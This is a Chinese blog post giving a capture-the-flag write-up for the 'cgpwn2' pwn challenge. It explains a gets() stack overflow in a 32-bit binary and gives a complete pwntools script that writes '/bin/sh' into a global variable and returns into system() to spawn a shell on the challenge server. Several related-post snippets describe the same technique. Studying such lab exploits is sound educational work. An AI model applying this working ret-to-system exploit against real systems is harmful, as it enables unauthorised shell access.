PWN做题笔记5-cgpwn2(已修订)

已于 2023-03-12 08:24:42 修改
阅读量215 收藏
点赞数
文章标签: 系统安全
于 2022-04-19 22:14:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/124285054
版权
本文介绍了如何利用32位ELF文件中未开启ASLR但存在栈保护的漏洞进行栈溢出攻击。通过ida反汇编分析,发现程序有两个输入阶段,第二次输入存在边界检查缺失。利用这个漏洞,构造payload覆盖栈上的参数,调用_system库函数,并通过.bss段的name变量传递/bin/sh字符串。最终成功执行系统命令,获取flag。
摘要由CSDN通过智能技术生成

原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1

32位ELF文件

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 未开启ALSR,但是有栈保护

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 程序实现依次进行两次输入

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 ida反汇编,main函数无注入点,hello函数第二次输入无边界检查,可以溢出

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_12,color_FFFFFF,t_70,g_se,x_16

 由于pwn方法包含了system方法,因此希望调用该方法,此外,需要覆盖参数

9e9b1d62047a451491d767902b21bbfe.png

又由于未提供/bin/sh字符串,需要通过向.bss存储的name传递性相应字符串来获取/bin/sh并作为_system方法的形参。 

name变量地址:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16 

_system库函数地址:

5c761afd27dd4770bee4bf9e6e330cb1.png 

注入内容构造为:

b"A"*(0x26+4)+p32(0x08048420)+p32(0)+p32(0x0804A080)

代码如下:

from pwn import *
host = '111.200.241.244'
port = 64827

#name:0804A080
#"A"*(0x26+4)+p32(0x0804855A)+p32(0)EBP+p32(0x0804A080)
p = connect(host, port)
payload = b"A"*(0x26+4)+p32(0x08048420)+p32(0)+p32(0x0804A080)
p.sendline("/bin/sh")
p.sendline(payload)
p.interactive()

如图,成功获取flag:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 

 

_alpaca_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 pwn
清霂的博客
02-02 647
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
cgpwn2(xctf)
weixin_43868725的博客
05-06 361
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
攻防世界pwn新手练习(cgpwn2
BurYiA的博客
03-26 496
题目链接 分析 我们来看这道题,首先checksec并运行一下 可以看到是32位程序,有两个输入点,保护只有 NX。 接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西 这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数 很遗憾的是只有system函数而没有我们需要的shellco...
攻防世界_pwn_cgpwn2(萌新版)
TedLau的博客
02-24 364
首发于鄙人博客:传送门 0x00 前言 省略file checksec,此两步大家都能够实现。 0x10 步骤 0x10 hello函数 为32位文件,用32位ida打开后,可以发现如下hello函数 在hello函数中我们可以发现,他让我们输入两块内容,一个是name,一个是some message。 0x11 _system函数 而在左侧的函数栏中,我们可...
小白写 PWN新手训练区 Writeup第九题:cgpwn2
qq_43409582的博客
09-04 272
0x01 刚刚入门pwn有不足的地方欢迎大佬们指正 首先检查保护: 只打开了NX,说明我们可以用栈溢出绕过检查; 用打开IDA,查看伪C代码,先看下主函数。 一个hello()函数,一个输出。 然后顺理成章的查看hello函数。发现两个可疑的函数,并且gets函数存在栈溢出漏洞,可以达到跳转的目的。 记下&s的地址(可能有用),接着查看name变量,发现在bss段上,说明是可以利用的。 ...
[攻防世界]cgpwn2
逆向萌新的博客
06-11 382
[攻防世界]cgpw2n
攻防世界pwn——cgpwn2
qq_62076255的博客
11-05 319
攻防世界pwn——cgpwn2
攻防世界pwn[cgpwn2]
最新发布
SUOYE_GUANXING的博客
10-31 121
将 "/bin/sh" 写入name, 用gets函数进行栈溢出, system为返回值, name为system的参数。flag为:cyberpeace{b232df4322e677518de6a61097130634}下载文件,先check一下;这里需要0x26+0x4才能到我们的返回地址;发现system,但没有/bin/sh;跟进name发现它是一个静态地址;学的还是有点迷,但慢慢来嘛~32位的ida打开;进入hello函数;
pwncgpwn2
qq_43430261的博客
10-22 736
https://blog.csdn.net/qq_43986365/article/details/94974853 https://blog.csdn.net/Closing_time/article/details/100428850 https://www.jianshu.com/p/3d19056282bf https://bbs.pediy.com/thread-254851.htm ...
攻防世界cgpwn2
zyh18851473527的博客
08-05 884
首先checksec,之后放入IDA中 点进hello 发现gets()函数可能会存在栈溢出,然后我们点进name 发现 name 地址是固定的,那我们可以它写入 bin/sh ,接着看能不能找到system 找到啦!所以这个题目的思路是:通过栈溢出漏洞,调用system函数,同时在name中写入"/bin/sh",把参数地址设置为name的首地址,就可以getshell了! gets() ...
习题-pwn2
m0_49959202的博客
09-18 134
文章目录pwn21.程序分析2.栈帧设计3.exp编写 pwn2 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现pie关闭: ida分析程序,发现存在system函数,因此可以到plt内找到system: 分析vulnerable_function(),可以得到需要溢出的长度为0x88 + 4 =136+4 = 140,同时存在read(),可以用来溢出 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3YpmnStC-1631942444
【攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1442
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢出,且溢出点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
pwn学习笔记2】cgpwn2(攻防世界新手pwn题)
weixin_45927195的博客
03-14 464
改变system函数的参数 先运行,发现可以输入两次。再查看防御机制,开启了NX保护,即堆栈不可执行。 用ida查看主函数,发现只有一个hello()函数。查看其内容,直接找到运行时看到的"please tell me your name"。第一次输入规定了长度,第二次没有规定,存在漏洞: 找到一个后门函数pwn(),存在 call _system语句,但是这个函数的参数"echo heheh...
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 305
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值